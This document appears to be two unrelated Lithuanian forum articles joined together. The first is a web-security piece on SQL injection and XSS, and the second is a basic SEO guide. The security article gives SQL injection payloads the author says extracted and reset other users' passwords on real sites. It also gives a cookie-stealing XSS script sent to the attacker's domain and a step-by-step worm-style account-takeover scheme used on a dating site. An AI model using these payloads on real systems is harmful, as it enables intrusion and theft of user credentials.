54756d656e6173

Kas nutiktų, jei kiekvienas pasaulio gyventojas turėtų po automatinį ginklą? Turbūt įsivyrautų anarchija ir chaosas.
 
PHP yra viena iš lengviausiai įsisavinamų programavimo kalbų, o atsižvelgiant į tai, kad nuolat didėja žmonių žingeidumas ir domėjimasis IT, tai dažnas jų bando kurti web sprendimus, kas ir yra (web sprendimai) tie automatiniai ginklai apie kuriuos užsiminiau.
 
Programos yra skirtos apdoroti ir dirbti su dideliais duomenų kiekiais, o informacijos valdymas šiais laikais ir yra didžiausias ginklas, juk ne veltui sakoma – kas valdo informaciją, tas valdo pasaulį. Kasdien mes registruojamės įvairiuose interneto platybių vietose ir ten pateikiame savo duomenis, slaptažodžius. O kas būtų, jei vieną dieną visai tai būtų paviešinta? Turbūt nieko gero...
 
O dabar prie techninių detalių. Iš patirties galiu pasakyti, kad būdų (kalbu apie web) rasti priėjimą prie įmonės duomenų yra N, bet šįkart norėčiau aptarti dažniausiai pasitaikančius du, kurie yra lengviausiai aptinkami ir išnaudojami.
 
SQL injection
 
SQL injekcijos tikslas yra išnaudoti galimybę pateikti formos arba GET užklausos kintamajį taip, kad galėtume pakoreaguoti originalią užklausą savo naudai. Niekada nemėgau teorijos ir visada buvau praktikas, tai tikiu, kad ir jums pavyzdys bus patogiau:
Taip atrodo kodas, esantis serveryje.

$vartotojas=$_POST[„user“]; $uzklausa="SELECT * FROM users WHERE name='$vartotojas’";
O kas būtų, jei vartotojo langelyje įrašytume
' or '1'='1 ?
Rezultatas gautųsi toks:

$uzklausa="SELECT * FROM users WHERE name='’ or ‘1’=’1’";
 
Suformavę tokią užklausą gauname, kad visada yra tenkinama sąlyga, nes 1 visada lygu 1. Tai buvo pats paprasčiausias pavyzdys, kuris pateikiamas kiekviename SQL injection straipsnyje, bet jei manote, kad viskas čia tuo ir apsiriboja, tai galiu pasakyti, kad klystate, nes realioje situacijoje tenka pakankamai pavargti, kartais ir paspėlioti, kol perprantama, kaip teisingai suformuoti užklausą.
 
Turiu vieną katalogą, kuriame kartais išsisaugau tokius dalykus, tai štai jums gyvenimiškesni pavyzdžiai:
 
Čia per slaptažodžio priminimo formą galėjau atsisiųsti kitų vartotojų slaptažodžius

' or email='[email protected]' union select '[email protected]',concat(email,':',DECODE(password,'client')) from clients limit 100,1 #
 
Čia per slaptažodžio keitimo formą galėjau pakeisti slaptažodį betkuriam vartotojui.

', 'site_administrators') or password=password AND id = '458' AND 'a'='a' #
 
Čia reikėjo sužinoti lentelės stulpelių pavadinimus žinant jos pavadinimą.

' limit 0 union select 1,(SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='users' limit 0,1) COLLATE utf8_unicode_ci,3,4,5,6,7,8,9 from users where password!='admin' or '
 
Traukiu slaptažodžius

' limit 0 union select 1,(SELECT CONCAT(id,'|',namex,'|',passwordx,'|',permission,'|',email,'|',u_name,'|',u_surname,'|',company,'|',admin_title) FROM users limit 0,1),3,4,5,6,7,8,9 from users where password!='admin' or '
 
Aš čia tikrai nesurašysiu visų galimų atvejų, nes tai būtų neįmanoma, o kiekvienas toks potyris yra unikalus, bet noriu sudominti, kad domėtumėtės ir bandytumėte, nes jūs niekada neparašysite saugaus kodo, kol į viską nepažvelgsite iš tos kitos pusės – saugumo specialisto pusės.
 
XSS (Cross site scripting)
 

„<script>alert(„Jūs buvote nulaužtas“)</script> bla=”
 
Tai yra XSS atakos pavyzdys, bet jo panaudojimas yra pateiktas iš standartinių XSS pavyzdžių. Pirmiausiai aptarkime jo technines panaudojimo galimybes, o tada prieisime prie jo praktiškesnio panaudojimo galimybių.
 
HTML laukelis

<input type=”text” value=”<?=$_GET[‘kintamasis1’]?>”>
 
Suformuota užklausa

www.svetaine.lt/?kintamasis1=x“ <script>alert(„Jūs buvote nulaužtas“)</script
 
Rezultatas HTML’E

<input type=”text” value=”x” <script>alert(„Jūs buvote nulaužtas“)</script>“
 
Rezultatas svetainėje yra akivaizdžiai matomas – jums iššoks lentelė, kad buvote nulaužtas. Tačiau tai, kad jūs pamatysite tokią lentelę naudos neduoda, tačiau dažnai galima susidurti su problema, kai tokie duomenys yra išsaugomi duomenų bazėje ir jie atvaizduojami kitiems lankytojams. Bet vėl gi, kokia jums nauda, jei ši lentelė iššoks kažkam? Atsakymas paprastas – jokios.
 

<script>document.location='http://www.tavosvetaine.lt/skriptas.php?sesija='+document.cookie</script>
 
Štai čia ir prasideda visas įdomumas. Pateiktame pavyzdyje lankytojas yra nukreipiamas į jūsų svetainės skriptą, kuriam perduodamas lankytojo sesijos ID. Toliau yra tik vienas kelias. Jūsų skriptas turėdamas sesijos ID gali naudodamas CURL biblioteką prisijungti prie „aukos“ paskyros ir atlikti jums reikalingus veiksmus (keisti duomenis ir pan.).
 
Žinau, kad laukiate realaus pavyzdžio, tai jūsų negalima nuvilti. Anksčiau šis pažeidžiamumas egzistavo vienoje pažinčių svetainėje, kai savo anketos formoje galėjai įrašyti tokį kodą. Kaip tai buvo galima išnaudoti? Slaptažodžiai pas juos DB buvo nekoduojami (slaptažodžio priminimo funkcija atsiunčia ne naują slaptažodį, o esantį).
 
Eiga:

Patalpinama kodą savo anketoją ir paruošiame skriptą, kuris perims sesijos duomenis.
Užeiname į kelių narių anketas ir 90% jų aplanko tavąją.
Perimamme jų sesijos ID ir pakeičiame jų paskyros el. paštą į savo.
Atsisiunčiame slaptažodį.
El. paštą atstatome į originalų, kad liktume nepastebėti.
Jų anketoje įdiegiame kenksmingą javascript.

 
Rezultate gausime, kad kenksmingas kodas labai greit išplis per visų narių anketas, o į mūsų pašto dėžutę suplauks daugybė slaptažodžių.
 
Apibendriminas
 
Šį straipsnį rašiau ne tam, kad jis būtų panaudotas blogiems tikslams, bet atvirkščiai – kad taptumėte geresniais programuotojais. Pasirinkdami šią specialybė jūs privalote suprasti, jog jūsų rankose bus neįkainuojama informacija, kurią jums patikės jūsų darbdaviai, klientai, o vieną kartą juos nuvylę daugiau galite ir nebe susigrąžinti. Tikiuosi, kad šis straipsnis padės jums suvogti, jog neužtenka vien sukurti produktą, bet reikia, kad jis būtų ir saugaus, nes šiuolaikinis verslas yra informacijos verslas.
 
P.S Apmaudu, kad savo praktikoje teko susidurti su ne vienu vadovu, kurie investuoja didžiules sumas į produktų sukūrimą, bet visiškai neįvertina fakto, kad jų verslas gali būti sužlugdytas per 1 valandos saugumo auditą. Šioje vietoje įžvelgiu labai gerą verslo nišą, nes Lietuvoje yra tik kelios rimtos įmonės, kurios gali atlikti saugumo auditus, bet viskam savas laikas...

Sveiki visi, forumiečiai, rašau savo trečiąjį straipsnį šiame forume. Šis stripsnyje, bus tiesiog parašyti žingsniai, kuriuos atliekant, Jūsų svetainėse turėtų pakilti paieškos sistemų rezultatuose (Kalbu apie populiariausias paieškos sistemas - Yahoo, Bing, Google)
 
Prieš skaitant šį straipsnį, patarčiau iš pradžių perskaityti šiuos straipsnius:

Google Pagerank Įtraukimas į paieškos sistemas. Ar verta mokėti pinigus? Kas Yra SEO?
 
O dabar, apie patį optimizavimą.
 
Domenas. Labai svarbu yra pasirinkti gerą domeną. Domenas padės jums būti aukštesniuose paieškos rezultatuose. Reiktų pasistengti, kad domene būtų raktinis žodis, pagal kurį jūsų svetainė būtų pasiekiama, bet jeigu jau turite svetainę, praleiskite šį punktą.. Tiesa, turint gerą domeną su raktažodžiu viduje, Jūs gaunate vadinamąjį SEO Boost, kuris padės Jums greičiau kilti paieškos rezultatuose.
 
Google KEYWORD tool - tai programa, kuri parodo jums, kiek į mėnesį google gauna užklausų su tam tikra fraze. Tai tai pat jums padės, jei norite apsispręsti dėl raktažodžio, kurį geriau pasirinkti. Naudojimas labai paprastas
 
Google KEYWORD TOOL - spauskite čia
 
Susidaryti sąrašą svetainės raktažodžių ir juos naudoti.
 
 
 
META Description

<meta name="description" content="aprašymas">
 
Meta description'o iš tiesų nereikia optimizuoti, ar kažką daryti, nes tai paprasčiausiai yra tekstas skirtas žmoniems, tai yra tas tekstas, kurį matote po paieškos rezultatu. Tai pat reiktų pabrėžti, kad jis neturi būti ilgesnis nei 155 simboliai ar ilgesnis nei 25-30 žodžių, nes google jį nukerpa ir toliau žmonės jo nematys.
 
Title tagai

<title>xxx</title>
Nedaugiau nei 70 simbolių, kiekvienas puslapis su tam tikru tagu, priklauso nuo to, kaip norima suindeksuoti.
Mano visada siūlomas pavyzdys, tai Pagrindinis raktažodis | antras raktažodis | Svetainės pavadinimas, visada jį naudoju, ir pasiekiu puikių rezultatų.
 
Jeigu norite paskaityti plačiau, skaitykite čia:
Apie title
http://www.seo-gold....le-optimization
ir *> naudojimas (Html headings)
 
Tai html heading'ai (antraštės), jų paskirtis puslapyje, tai antraštės, arba kitaip paragrafų pavadinimai. Pats svarbiausias paragrafas, turi būti h1, toliau eina h2, o jei h2 turi dar kažkokių atskirų skilčių, naudojamas h3 ar H4 Nebūtinai turi eiti iš eilės.

<h1> antraštė </h1> <h2> antraštė </h2> <h3> antraštė </h3> <h4> antraštė </h4> <h5> antraštė </h5> <h6> antraštė </h6>
 
 
Plačiau:
Heading tags and SEO
 
P.S - kartais h1 būna per didelis, todėl patariu naudoti kodą, kuris pateiktas po šiuo užrašu.

<h1 style="margin-bottom: 0px; font-size: 12px;">Padarys mažą antraštę su mažai vietos po ja, kaip normalus tekstas.</h1>
 
 
Naudokite raktinius žodžius tekste, tuos, kuriuos išsirinkote keyword tool'e.
Naudokite raktažodžius savo svetainės tekstuose. Tai yra SEO tekstų paslaptis, jie yra prisotinti raktažodžių, ir taip Google galvoja, kad Jūsų svetainėje pateikta tikrai vertinga informacija apie raktažodį.
 
Svetainėje, naudokite tik unikalius tekstus
Neunikalūs tekstai, gali neigiamai paveikti jūsų svetainę, nes ji jau bus kažkur suindeksuota. Tokiu būdu Jūs tik pagelbėsite tam žmogui, iš kieno svetainės kopijavote tekstą.
7.Naudokite alt ir title tag'us paveikseliuose
 
Kadangi google, neturi akių, reikia jai parašyti, kas yra tuose paveiksliukuose, dėl to reikia paveikslėlio kodą naudoti būtent tokį:

<img src="angry.gif" alt="Angry face" title="This picture is showing how angry face looks like" />
 
Tas kas eina po alt yra aprašymas. Tai pat paveiksliuko pavadinimas turi būti susijęs su tema. Paveiksliuko pavadinimas - tai kaip jis vadinasi.
 
LINKAI (nuorodos)
 
Naudokite tokius linkus, tada google juos vertina žymiai daugiau, nei paprastus. Naudokite raktažodžius aprašymuose.

<a href="blah.html" title="įrašykite title, naudokite raktažodžius"> Kaip žmonės matys linką </a>
 
Robots.txt
 
Padeda indeksavimui. į puslapį, kurį reikia suindeksuoti, dėti:

<meta name="robots" content="index,follow">
 
Į puslapį, kurio nereikia indeksuoti:

<meta name="robots" content="noindex">
 
Į robots.txt failą įdėti:
 

User-agent: * Disallow: /cgi-bin/ Disallow: /clients/ Disallow: /desi/ Disallow: /ranch/ Disallow: /stuff/ Disallow: /vsd/ Disallow: /more-links.php?* User-agent: Fasterfox Disallow: / User-agent: aipbot Disallow: / User-agent: BecomeBot Disallow: / User-agent: psbot Disallow: / User-agent: Xenu Link Sleuth 1.2g Disallow: / User-agent: Xenu Disallow: / Sitemap: http://www.domenas.lt/sitemap.xml
 
Sukurti sitemap'ą, ir jį įdėti į visų failų direktoriją.
 
Žemėlapį gali sukurti paspaudus nuorodą žemiau:
 
Sitemap
 
http://img847.imageshack.us/img847/6064/sitemap.png
 
http://img856.imageshack.us/img856/5708/sitemap2.png
 
Pridėkite prie nuorodų katologų, tai padeda, į tinklapį ateina daugiau lankytojų, ir Google bei kitos paieškos sistemos geriau vertina tokias svetaines.
 
Sutvarkyti HTML kodą: http://validator.w3.org/
 
Google pirmiausia rodys svetaines, kurios yra be kodo klaidų,tai nepatingėkite savo laiko, ir sutvarkykite. Kad tai padarytumėte, tiesiog reikia šiek tiek išmanyte html - nemanau, kad tai bus sunku, o ir svetainės kodas bus švaresnis, ir jį eis lengviau redaguoti.
 
Pridėkite svetainę į google. Įrašę čia savo adresą, paieškos sistemos robotas apsilankys ir suindeksuos Jūsų svetainę.
 
Pridėjimas į google
http://img171.imageshack.us/img171/9435/googledh.png
 
Draugiški url - draugiški adresai
 
Dažnai žmoniem iškyla klausimai, kaip reikia padaryti adresus gražius, tarkim tokius:
 
 
O tai padaryti iš tiesų yra labai paprasta, tiesiog reikia nueiti į tinklapį:
http://searchfriendlyurls.com/ ir suvesti visus savo svetainės puslapius, ir kokie jie norite, kad būtų. Iš tiesų labai paprasta, right?
 
Tačiau, kad tai būtų naudinga SEO prasme, reikia atsižvelgti, į tai kokius juos darote, neužtenka, kad jie tiesiog būtų sutrumpinta.
 
Du pvz,
 
Tarkim jūs turite svetainę, gyvunai.lt
 
Norint geriausiai sugropuoti gyvenus, tai reiktu daryti tarkim taip:
http://www.gyvunai.lt/zinduoliai/drambliai(arba gyvunai/, cia jau priklauso nuo tinklapio ir tikslo)
 
Arba, pardavinejat kazkokias programas internetine, tai tada turetu buti mazdaug taip:
www.soft.lt/programine-irange/windows-7
 
KITA:
Naudota svetainė:
Leidimas:
 
P.S jei norite pasitikrinti, ar gerai atlikote savo svetainės seo optimizaciją, siūlau svetainę http://www.seoworkers.com/
Jeigu domitės SEO šiek tiek ilgiau, naudokitės SEO įrankiais, jie padės jums atlikti darbą žymiai greičiau.
Jeigu norite perskaityti knygą apie SEO, skaitykite šią (EN kalba): http://thepiratebay....8SEO%29_Secrets
virusų nėra
 
Nenaudokite Black hat seo, nes tai greičiausiai užblokuos Jūsų svetainę. Naudokite straipsnyje pateiktus metodus, ir jie Jums garantuos ilgalaikius rezultatus, nors ir reikės truputį daugiau laiko jiems pasiekti.